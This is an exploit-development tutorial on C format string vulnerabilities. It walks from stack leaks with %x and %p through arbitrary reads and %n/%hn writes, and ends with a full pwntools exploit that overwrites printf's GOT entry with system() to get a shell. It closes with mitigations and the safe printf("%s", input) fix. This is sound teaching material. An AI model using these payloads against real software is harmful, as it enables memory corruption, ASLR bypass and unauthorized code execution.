Thilan Dissanayaka Exploit Development April 08, 2020

Format String Vulnerabilities — Reading and Writing Memory with printf

In the ROP article, we bypassed DEP by chaining existing code fragments. But we left one problem unsolved: ASLR. Address Space Layout Randomization randomizes where the stack, heap, and shared libraries are loaded on every run (and the executable itself, when it is built as PIE), so our hardcoded gadget addresses break.

To defeat ASLR, we need to leak a memory address at runtime — discover where libc or the executable actually loaded — and then calculate our gadget addresses from that.

The most classic way to leak memory? A format string vulnerability. One misused printf() call gives us the ability to read the stack, read arbitrary memory addresses, and even write to arbitrary memory. All from a single bug.

Format string vulnerabilities are one of the most elegant and powerful bug classes in C. Let’s explore them.

The Vulnerability

Consider this C code:

#include <stdio.h>

int main() {
    char input[256];
    fgets(input, sizeof(input), stdin);
    printf(input);  // VULNERABLE — user input as format string
    return 0;
}

The bug is on one line: printf(input). The first argument to printf is the format string — it controls how printf interprets the remaining arguments. When you pass user input directly as the format string, the user controls printf’s behavior.

The correct version:

printf("%s", input);  // SAFE — user input is data, not format

With %s, printf treats input as data to print. Without it, printf treats input as instructions.

This mistake seems trivial, but the consequences are devastating.

How printf Actually Works

To understand the exploit, we need to understand how printf reads its arguments.

printf("Name: %s, Age: %d, Score: %f\n", name, age, score);

printf processes the format string left to right. When it encounters a format specifier (%s, %d, %f), it reads the next argument from the stack (on 32-bit) or from registers then the stack (on 64-bit).

On 32-bit x86, the stack looks like this during the printf call:

Higher addresses
┌─────────────────────────┐
│ score (double)           │  ← 3rd argument
├─────────────────────────┤
│ age (int)                │  ← 2nd argument
├─────────────────────────┤
│ name (char*)             │  ← 1st argument
├─────────────────────────┤
│ format string pointer    │  ← printf's 1st param
├─────────────────────────┤
│ return address           │
└─────────────────────────┘
Lower addresses (ESP)

printf doesn’t know how many arguments were actually passed. It blindly trusts the format string. If the format string says %x %x %x, printf reads three values from the stack — whether or not three arguments were pushed.

This is the core of the vulnerability. If we control the format string, we control how many stack values printf reads, and what it does with them.
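To make that concrete, here is a minimal sketch of the idea in Python. It is a toy model, not how glibc implements printf: the function name toy_printf and the sample stack words are made up for illustration, and only %x and %% are handled.

```python
import re

def toy_printf(fmt, stack):
    """Toy model of 32-bit printf: each %x consumes the next stack word.

    `stack` is the list of 32-bit words sitting above the format string
    pointer, whether or not the caller meant them to be arguments.
    """
    next_arg = 0  # index of the next word to consume
    out = []
    for literal, spec in re.findall(r"([^%]+)|%([x%])", fmt):
        if literal:
            out.append(literal)
        elif spec == "%":
            out.append("%")
        else:
            # No check against the real argument count: this is the bug.
            out.append(f"{stack[next_arg]:x}")
            next_arg += 1
    return "".join(out)

# The caller passed one argument (0x11111111); the rest is unrelated stack data.
stack_words = [0x11111111, 0x22222222, 0x33333333]
print(toy_printf("%x %x %x", stack_words))  # 11111111 22222222 33333333
```

The format string asked for three values, so three values came back, even though only the first was a genuine argument.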

Reading the Stack — %x and %p

Let’s compile and exploit our vulnerable program:

$ gcc -m32 -no-pie -fno-stack-protector -o vuln vuln.c
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Now let’s send format specifiers as input:

$ echo "AAAA %x %x %x %x %x %x %x %x" | ./vuln
AAAA f7f9d580 ffffd6e8 8048449 f7f9d000 0 0 41414141 20782520

Look at that output. printf processed our %x specifiers and printed stack values in hex. Those are real values sitting on the stack — saved registers, return addresses, function arguments.

And there, at position 7: 41414141. That’s our AAAA (0x41 is the ASCII code for ‘A’). We found our own input on the stack.

Why? Because input is a local variable — it’s stored on the stack. When printf walks up the stack looking for arguments, it eventually reaches the buffer that contains our format string itself.

This is huge. It means:

We can read any value on the stack by using enough %x specifiers
We can read our own input — and since we control our input, we can place specific values on the stack
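Counting positions by eye gets tedious, so a small helper can do it. The sketch below assumes a 32-bit little-endian target and output shaped like the run above; the function names are hypothetical.

```python
import struct

def find_input_offset(leak_output, marker=b"AAAA"):
    """Return the 1-based position of the %x word that equals `marker`.

    Assumes the output looks like 'AAAA w1 w2 w3 ...', where each w is a
    hex word printed by one %x.
    """
    target = struct.unpack("<I", marker)[0]
    words = leak_output.split()[1:]  # drop the echoed marker itself
    for position, word in enumerate(words, start=1):
        if int(word, 16) == target:
            return position
    return None

def word_to_bytes(word):
    """Show a leaked 32-bit word as the bytes it occupies in memory."""
    return struct.pack("<I", word)

output = "AAAA f7f9d580 ffffd6e8 8048449 f7f9d000 0 0 41414141 20782520"
print(find_input_offset(output))   # 7
print(word_to_bytes(0x20782520))   # b' %x '
```

The second call shows that position 8 is simply the next four bytes of our own input: a space, %x, and another space.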

Direct Parameter Access

Instead of chaining %x %x %x %x %x %x %x to reach position 7, we can access it directly:

$ echo 'AAAA %7$x' | ./vuln
AAAA 41414141

The %7$x syntax means “print the 7th argument in hex.” This is called direct parameter access — and it makes our exploits much cleaner.

Let’s use %p (which prints pointers with the 0x prefix) to make the output clearer:

$ echo '%1$p %2$p %3$p %4$p %5$p %6$p' | ./vuln
0xf7f9d580 0xffffd6e8 0x8048449 0xf7f9d000 (nil) (nil)

Look at those values:

0xf7f9d580 — Looks like a libc address
0xffffd6e8 — Stack address
0x8048449 — Code address (in the executable)

We’re leaking real memory addresses. With ASLR on, these addresses change every run — but once we leak one, we can calculate the base address of libc and use that to find our ROP gadgets.

Leaking libc Base — Defeating ASLR

This is where format strings become a critical exploitation primitive.

Let's say position 2 on the stack contains 0xf7e2aad3, a return address inside libc. We know (from the binary's debug info or by examining libc) that this address is at offset 0x1aad3 from libc's base.

libc_base = leaked_address - known_offset
libc_base = 0xf7e2aad3 - 0x1aad3 = 0xf7e10000

Now we know libc’s base address. Every function and gadget in libc is at libc_base + offset:

system()  = libc_base + 0x3ada0 = 0xf7e4ada0
"/bin/sh"  = libc_base + 0x15ba0f = 0xf7f6ba0f

Format string → address leak → ASLR defeated → ROP chain with correct addresses → shell.
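The arithmetic is easy to get wrong by hand, so it helps to let Python do it and sanity-check the result. This is a small sketch: the helper name is hypothetical, the offsets are the ones quoted above, and the leak value is an example chosen so that the base comes out as 0xf7e10000.

```python
PAGE_SIZE = 0x1000

def libc_base_from_leak(leaked_address, known_offset):
    """Subtract the known offset and check the result is page-aligned."""
    base = leaked_address - known_offset
    if base % PAGE_SIZE != 0:
        # Shared libraries are mapped on page boundaries, so a misaligned
        # base usually means the wrong offset or the wrong libc version.
        raise ValueError(f"suspicious libc base {base:#x}")
    return base

leak = 0xf7e2aad3                      # example leaked return address
base = libc_base_from_leak(leak, 0x1aad3)
print(hex(base))                       # 0xf7e10000
print(hex(base + 0x3ada0))             # 0xf7e4ada0  (system)
print(hex(base + 0x15ba0f))            # 0xf7f6ba0f  ("/bin/sh")
```

The alignment check will not catch every mistake, but it catches the common one of using offsets from a different libc build.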

In a real exploit using pwntools:

from pwn import *

p = process('./vuln')

# Leak libc address from stack position 2
p.sendline(b'%2$p')
leak = int(p.recvline().strip(), 16)

libc_base = leak - 0x1aad3
log.info(f"libc base: {hex(libc_base)}")

system = libc_base + 0x3ada0
binsh  = libc_base + 0x15ba0f
log.info(f"system(): {hex(system)}")
log.info(f"/bin/sh:  {hex(binsh)}")

Reading Arbitrary Memory — %s

%x and %p print values from the stack as numbers. But %s is different — it treats the stack value as a pointer and prints the string at that address.

If we can place an address on the stack (via our input buffer) and then use %s to dereference it, we can read any readable memory address.

We found that our input starts at stack position 7. So:

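# Read memory at address 0x08048001 (one byte into the ELF header)
# 0x08048000 itself cannot go at the start of the payload: packed little-endian,
# its first byte is \x00, and printf would stop parsing the format right there.
import struct

addr = struct.pack("<I", 0x08048001)
payload = addr + b"%7$s"

# addr lands at position 7 on the stack
# %7$s treats position 7 as a pointer and prints the string there

$ python3 -c "import struct; import sys; sys.stdout.buffer.write(struct.pack('<I', 0x08048001) + b'%7\$s')" | ./vuln | xxd | head
00000000: 0180 0408 454c 4601 ...

The first four bytes are our address echoed back, because printf prints them as ordinary characters. The bytes that follow, 45 4c 46, are "ELF": the tail of the ELF magic \x7fELF. We just read arbitrary memory through printf.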

We can use this to:

Read the GOT (Global Offset Table) to leak libc function addresses
Read the stack to find canaries or return addresses
Read any readable memory in the process
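One practical catch is that the address travels inside the format string, so some byte values cut the payload short. The helper below is a sketch under the assumptions used so far (32-bit little-endian target, input read with fgets, buffer starting at the given stack position); the function name is hypothetical.

```python
import struct

# printf stops parsing at a NUL byte, and fgets stops reading at a newline.
BAD_BYTES = b"\x00\n"

def build_read_payload(address, position):
    """Payload that prints the string stored at `address` via %<position>$s."""
    packed = struct.pack("<I", address)
    if any(byte in BAD_BYTES for byte in packed):
        raise ValueError(f"address {address:#x} contains a NUL or newline byte")
    return packed + f"%{position}$s".encode()

print(build_read_payload(0x08048001, 7))  # b'\x01\x80\x04\x08%7$s'
```

An address such as 0x08048000 is rejected here because its lowest byte is zero, which would end the format string before the %s is ever reached. Placing the address after the specifiers is one way around that.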

Writing Memory — %n (The Dangerous One)

Here’s where format strings go from “info leak” to “full compromise.”

The %n format specifier is unique: instead of printing something, it stores the number of characters printed so far into the int that its argument points to.

int count;
printf("hello%n", &count);
// count is now 5 (length of "hello")

If we control the format string and can place an address at a known stack position, we can use %n to write to that address.

How the Write Works

We want to write a value to a specific memory address. Here’s the approach:

Place the target address in our input (it lands on the stack at a known position)
Use %Xc to print exactly X characters (controlling the “bytes printed” counter)
Use %n to write the counter to the target address

Writing a Small Value

# Write the value 0x42 (66) to address 0x0804a020
import struct

target_addr = struct.pack("<I", 0x0804a020)

# Print 66 characters (using padding), then write with %n
# Our address is at stack position 7
payload = target_addr + b"%62c%7$n"
# 4 bytes (address) + 62 chars padding = 66 total → writes 0x42

The %62c prints 62 characters (a padded version of a stack value). Combined with the 4 bytes of the address, that’s 66 characters total. %7$n then writes 66 (0x42) to the address at position 7 — which is 0x0804a020.
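The same calculation can be wrapped in a function so the padding is never worked out by hand. This is a minimal sketch assuming the layout above (32-bit target, address at the very start of the buffer); build_small_write is a made-up name.

```python
import struct

def build_small_write(address, value, position):
    """Payload that stores `value` at `address` with a single %n."""
    packed = struct.pack("<I", address)
    padding = value - len(packed)  # the 4 address bytes are printed first
    if padding < 1:
        raise ValueError("with this layout the value must be at least 5")
    return packed + f"%{padding}c%{position}$n".encode()

print(build_small_write(0x0804a020, 0x42, 7))  # b' \xa0\x04\x08%62c%7$n'
```

The lower bound exists because the four address bytes always count toward the total, and %c prints at least one character.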

Writing a Large Value — Two Writes with %hn

Writing large values (like a full 4-byte address) with a single %n would require printing billions of characters. Instead, we write 2 bytes at a time using %hn (half-word write) or 1 byte at a time using %hhn.

To write 0xdeadbeef to address 0x0804a020:

Write 0xbeef to 0x0804a020 (lower 2 bytes)
Write 0xdead to 0x0804a022 (upper 2 bytes)

import struct

addr_low  = struct.pack("<I", 0x0804a020)  # write lower 2 bytes here
addr_high = struct.pack("<I", 0x0804a022)  # write upper 2 bytes here

# We need to print 0xbeef (48879) chars before first %hn
# Then print enough more to reach 0xdead (57005) before second %hn
# %hn stores only the low 16 bits of the counter, so we calculate modulo 0x10000

low_val  = 0xbeef  # 48879
high_val = 0xdead  # 57005

# Addresses take 8 bytes (4+4), printed so far = 8
pad1 = low_val - 8       # chars to print before first write
pad2 = (high_val - low_val) % 0x10000  # additional chars before second write

payload  = addr_low + addr_high
payload += f"%{pad1}c%7$hn".encode()
payload += f"%{pad2}c%8$hn".encode()
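To check this kind of payload without a target, the padding logic can be generalized and replayed in a tiny simulator. The sketch below assumes the same layout (two addresses at the start of the buffer, 32-bit little-endian); both function names are hypothetical, and the simulator only understands the two directives the builder emits.

```python
import re
import struct

def build_hn_write(address, value, position):
    """Write a 32-bit `value` at `address` using two %hn stores."""
    low, high = value & 0xffff, value >> 16
    payload = struct.pack("<II", address, address + 2)
    printed = len(payload)  # the 8 address bytes are output first
    parts = []
    for half, slot in ((low, position), (high, position + 1)):
        pad = (half - printed) % 0x10000  # distance to the target, mod 2^16
        if pad:
            parts.append(f"%{pad}c")
        parts.append(f"%{slot}$hn")
        printed += pad
    return payload + "".join(parts).encode()

def simulate_hn(directives, already_printed):
    """Replay %Nc / %N$hn directives and return {stack slot: 16-bit value}."""
    printed, stores = already_printed, {}
    for width, slot in re.findall(rb"%(\d+)c|%(\d+)\$hn", directives):
        if width:
            printed += int(width)
        else:
            stores[int(slot)] = printed & 0xffff
    return stores

payload = build_hn_write(0x0804a020, 0xdeadbeef, 7)
print(payload[8:])                                   # b'%48871c%7$hn%8126c%8$hn'
print(simulate_hn(payload[8:], 8) == {7: 0xbeef, 8: 0xdead})  # True
```

Because the padding is taken modulo 0x10000, the builder also copes with values whose upper half is smaller than the lower half, such as 0x1234beef.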

This is admittedly fiddly. In practice, most people let pwntools do it:

from pwn import *

# pwntools handles all the math automatically
# (named `payload` so we don't shadow the fmtstr_payload function)
payload = fmtstr.fmtstr_payload(7, {0x0804a020: 0xdeadbeef})

Practical Exploit — GOT Overwrite to Shell

Now let’s combine everything into a full exploit. The target: overwrite a function’s GOT entry to redirect execution.

The GOT (Global Offset Table) contains the resolved addresses of library functions. When the program calls printf(), it actually jumps to the address stored in printf’s GOT entry. If we overwrite that entry with the address of system(), the next time the program calls printf(), it calls system() instead.
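As a mental model, the GOT behaves like a writable table of function pointers that every call goes through. The toy sketch below models that with a Python dict; the function names are invented for illustration, and it says nothing about how the dynamic linker actually fills the table.

```python
def real_printf(text):
    return f"printf prints: {text}"

def real_system(command):
    return f"system runs: {command}"

# Toy GOT: one writable slot per imported function.
got = {"printf": real_printf}

def call_via_plt(name, argument):
    """Model of a PLT stub: jump to whatever the GOT slot currently holds."""
    return got[name](argument)

print(call_via_plt("printf", "/bin/sh"))  # printf prints: /bin/sh
got["printf"] = real_system               # the effect of our %n write
print(call_via_plt("printf", "/bin/sh"))  # system runs: /bin/sh
```

The calling code never changes. Only the slot it reads from does, which is why a single memory write is enough to redirect execution.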

The Vulnerable Program

#include <stdio.h>
#include <string.h>

int main() {
    char input[256];

    while (1) {
        printf("> ");
        fgets(input, sizeof(input), stdin);
        printf(input);  // VULNERABLE
    }

    return 0;
}

The loop is helpful — it gives us multiple interactions. We can leak addresses first, then write.

Step 1: Leak libc Address

from pwn import *

p = process('./vuln')
elf = ELF('./vuln')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

# Leak a libc address from the stack.
# Position 3 is specific to this build: confirm in a debugger which
# position holds a return address into __libc_start_main.
p.recvuntil(b"> ")
p.sendline(b"%3$p")
leak = int(p.recvline().strip(), 16)

libc.address = leak - libc.symbols['__libc_start_main'] - 247  # offset depends on version
log.info(f"libc base: {hex(libc.address)}")

Step 2: Overwrite GOT Entry

Now overwrite printf’s GOT entry with system():

# printf@GOT → system()
# Next time printf(input) is called, it becomes system(input)
# If we send "/bin/sh", it calls system("/bin/sh")

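p.recvuntil(b"> ")
payload = fmtstr.fmtstr_payload(7, {elf.got['printf']: libc.symbols['system']})
p.sendline(payload)
log.success("GOT overwrite successful")  # payload sent; we assume the write landed

# Now printf is actually system(), so the "> " prompt is no longer printed
# reliably and we must not wait for it. Send /bin/sh straight away.
p.sendline(b"/bin/sh")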

p.interactive()

$ python3 exploit.py
[*] libc base: 0xf7e10000
[+] GOT overwrite successful
$ whoami
thilan
$ id
uid=1000(thilan) gid=1000(thilan)

Shell. No shellcode. No ROP chain. Just printf.

Format Strings on 64-bit

On x86-64, the first 6 arguments go in registers (rdi, rsi, rdx, rcx, r8, r9). Stack arguments start at the 7th. But since printf consumes the first argument (the format string pointer in rdi), the “stack” arguments for format specifiers start at the 6th position.
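The mapping from a positional specifier to its source can be written down directly. This sketch assumes the System V AMD64 calling convention and integer or pointer arguments only (floating-point values travel in xmm registers); arg_location is a hypothetical helper, and the stack offsets are relative to the caller's rsp at the call instruction.

```python
# rdi holds the format string, so %1$ starts at rsi.
REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]

def arg_location(position):
    """Where printf finds the value for %<position>$... on x86-64."""
    if position < 1:
        raise ValueError("positions are 1-based")
    if position <= len(REGISTERS):
        return REGISTERS[position - 1]
    stack_index = position - len(REGISTERS) - 1
    return f"[rsp + {8 * stack_index}]"

for n in (1, 5, 6, 7):
    print(n, arg_location(n))
# 1 rsi
# 5 r9
# 6 [rsp + 0]
# 7 [rsp + 8]
```

So %1$p through %5$p leak register contents, and everything from %6$p onward walks the stack in 8-byte steps.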

The other key difference: addresses are 8 bytes and often contain null bytes (0x00007fff...). Since printf stops at null bytes (it’s a string function), we can’t put addresses at the beginning of our payload. Instead, we put them after the format specifiers:

# 64-bit format string layout
# Format specifiers first, then addresses (to avoid null byte truncation)
payload  = b"%Xc%Y$hn"    # format specifiers (no null bytes)
payload += b"\x00" * padding
payload += p64(target_addr)  # null bytes are fine at the end
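A concrete version of that layout needs to know which stack position the address will land on, which depends on how much space the format text takes. The sketch below reserves a fixed, 8-byte-aligned area for the format text so the position is easy to compute. It assumes the input routine passes NUL bytes through (as fgets does) and that the buffer's starting position is already known; the function and parameter names are hypothetical.

```python
import struct

def build_write64(address, value, buffer_position, reserve=24):
    """One %hn write on x86-64 with the address placed after the format text.

    `buffer_position` is the stack position where the input buffer begins;
    `reserve` is the space set aside for the format text, a multiple of 8.
    """
    if reserve % 8 or not 1 <= value <= 0xffff:
        raise ValueError("reserve must be a multiple of 8, value must fit in 16 bits")
    address_position = buffer_position + reserve // 8
    fmt = f"%{value}c%{address_position}$hn".encode()
    if len(fmt) >= reserve:
        # Keep at least one NUL so printf stops before the address bytes.
        raise ValueError("format text does not fit in the reserved space")
    return fmt.ljust(reserve, b"\x00") + struct.pack("<Q", address)

payload = build_write64(0x601040, 0xbeef, buffer_position=6)
print(payload[:12])   # b'%48879c%9$hn'
print(len(payload))   # 32
```

With 24 bytes reserved and the buffer at position 6, the address sits three slots further along, at position 9. Nothing is printed before the %c here, so the padding width equals the value being written.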

pwntools handles this layout for you once it knows the target is 64-bit:

# fmtstr_payload follows the pwntools context, so set the architecture first
context.arch = 'amd64'
payload = fmtstr.fmtstr_payload(6, {target: value}, write_size='short')

Format String Variants in the Wild

The vulnerability isn’t limited to printf. Any function that takes a format string is potentially vulnerable:

Function	Risk
`printf(user_input)`	Classic — prints to stdout
`fprintf(file, user_input)`	Writes to a file
`sprintf(buf, user_input)`	Writes to a buffer (also buffer overflow risk)
`snprintf(buf, n, user_input)`	Bounded write to buffer
`syslog(priority, user_input)`	Logs — often overlooked
`err()/warn()` (BSD)	Error reporting functions

Any of these with user-controlled format strings is exploitable. syslog is especially dangerous because developers often don’t think of log messages as a security surface.

Mitigations

Compiler Warnings

GCC and Clang warn about format string issues:

$ gcc -Wall -Wformat-security vuln.c
vuln.c:6:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(input);
     ^

Always compile with -Wall -Wformat-security. Better yet, use -Werror to turn warnings into errors.

FORTIFY_SOURCE

The _FORTIFY_SOURCE macro (enabled at level 2 by the default toolchain or package build flags of many Linux distributions, and only effective when optimization is on) replaces printf with a hardened version that aborts when it finds %n in a format string stored in writable memory:

$ gcc -D_FORTIFY_SOURCE=2 -O2 vuln.c -o vuln
$ echo '%n' | ./vuln
*** %n in writable segment detected ***
Aborted (core dumped)

This blocks %n writes but doesn’t prevent %x/%p/%s leaks. Information leaks still work.

RELRO (Read-Only GOT)

Full RELRO makes the GOT read-only after the dynamic linker resolves all symbols at load time. This prevents GOT overwrite attacks.

$ gcc -Wl,-z,relro,-z,now vuln.c -o vuln

With full RELRO, the GOT is mapped as read-only — our %n write to the GOT will segfault instead of redirecting execution.

The workaround: instead of overwriting the GOT, overwrite other targets — return addresses on the stack, .fini_array entries, or function pointers in application data.

Best Practice: Never Use User Input as a Format String

The real fix is trivial:

// WRONG
printf(input);
fprintf(log, user_message);
syslog(LOG_INFO, user_data);

// RIGHT
printf("%s", input);
fprintf(log, "%s", user_message);
syslog(LOG_INFO, "%s", user_data);

Always use "%s" to print user-controlled strings. There is never a legitimate reason to pass user input as a format string.
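For a quick audit of an existing codebase, a crude scanner can flag calls whose format argument is not a string literal. The sketch below is a rough heuristic, not a replacement for -Wformat-security: it works line by line, does not understand macros or multi-line calls, and the function names and the table of format-argument positions are my own assumptions about what to check.

```python
import re

# 0-based index of the format-string argument for each function.
FORMAT_ARG = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL = re.compile(r"\b(" + "|".join(FORMAT_ARG) + r")\s*\(")

def split_args(text):
    """Split argument text on top-level commas, stopping at the closing ')'."""
    args, current, depth, in_string = [], "", 0, False
    i = 0
    while i < len(text):
        ch = text[i]
        if in_string:
            current += ch
            if ch == "\\" and i + 1 < len(text):
                current += text[i + 1]  # keep the escaped character
                i += 1
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
            current += ch
        elif ch == "(":
            depth += 1
            current += ch
        elif ch == ")":
            if depth == 0:
                break  # end of this call's argument list
            depth -= 1
            current += ch
        elif ch == "," and depth == 0:
            args.append(current.strip())
            current = ""
        else:
            current += ch
        i += 1
    args.append(current.strip())
    return args

def find_suspect_calls(source):
    """Return (line_number, function) for calls whose format is not a literal."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        code = line.split("//")[0]  # crude: drop line comments
        for match in CALL.finditer(code):
            args = split_args(code[match.end():])
            index = FORMAT_ARG[match.group(1)]
            if index < len(args) and not args[index].startswith('"'):
                hits.append((number, match.group(1)))
    return hits

sample = 'printf(input);\nprintf("%s", input);\nsyslog(LOG_INFO, user_data);'
print(find_suspect_calls(sample))  # [(1, 'printf'), (3, 'syslog')]
```

Anything it reports still needs a human look, since a non-literal format can be perfectly safe when it never carries user input.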

Cheat Sheet — Format Specifiers for Exploitation

Specifier	Action	Use
`%x`	Print stack value as hex	Stack leak
`%p`	Print stack value as pointer (with 0x prefix)	Stack leak
`%s`	Dereference pointer, print as string	Arbitrary read
`%n`	Write bytes-printed count (4 bytes)	Arbitrary write
`%hn`	Write bytes-printed count (2 bytes)	Arbitrary write (half-word)
`%hhn`	Write bytes-printed count (1 byte)	Arbitrary write (byte)
`%N$x`	Print Nth argument as hex	Direct parameter access
`%Nc`	Print N characters (padding)	Control write value

Final Thoughts

Format string vulnerabilities are a masterclass in how a seemingly minor API misuse — passing user input where a format string is expected — can cascade into full system compromise. From a single printf(input), we can:

Read the stack — Leak canaries, return addresses, saved registers
Read arbitrary memory — Dereference any readable address
Defeat ASLR — Leak libc/executable addresses to calculate offsets
Write arbitrary memory — Overwrite GOT entries, return addresses, function pointers
Achieve code execution — Redirect control flow to system() or a ROP chain

Combined with the ROP techniques we covered earlier, format strings complete the modern exploitation toolkit:

Format string leak → Defeat ASLR → Build ROP chain → Bypass DEP → Shell

That’s the realistic exploitation chain for modern binaries with all protections enabled. And it often starts with a single misused printf.

Happy reversing!